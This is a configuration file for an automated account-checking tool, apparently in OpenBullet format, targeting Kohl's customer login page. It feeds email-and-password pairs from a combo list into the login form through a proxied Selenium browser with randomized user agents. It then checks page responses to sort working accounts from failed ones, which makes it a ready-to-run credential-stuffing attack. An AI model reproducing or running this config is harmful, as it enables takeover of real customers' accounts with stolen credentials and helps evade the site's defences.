[SETTINGS]
{
  "Name": "Kohls Selenium BASE",
  "SuggestedBots": 1,
  "LastModified": "2018-12-18T21:26:37.5783352+00:00",
  "AdditionalInfo": "As for now just a simple Base Config. will Add some more to it soon",
  "Author": "Kermit",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": true,
  "CustomCMDArgs": ""
}
[SCRIPT]
BROWSERACTION Open "" 
NAVIGATE "https://www.kohls.com/upgrade/myaccount/guest_order_login.jsp" 60 
ELEMENTACTION Id "email_signup_scs_inputbox" 
  SendKeys "<USER>" -> VAR "" 
ELEMENTACTION Id "email_passowrd_scs" 
  SendKeys "<PASS>" -> VAR "" 
ELEMENTACTION Name "/atg/userprofiling/ProfileFormHandler.login" 
  Click "" -> VAR "" 
ELEMENTACTION Id "orderSignIn" 
  Click " " -> VAR "" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "statusCode\":200," 
    KEY "class=\"welcome-text" 
  KEYCHAIN Failure OR 
    KEY "The email address and/or password you entered has an error" 
BROWSERACTION ClearCookies "" 
BROWSERACTION Quit "" 
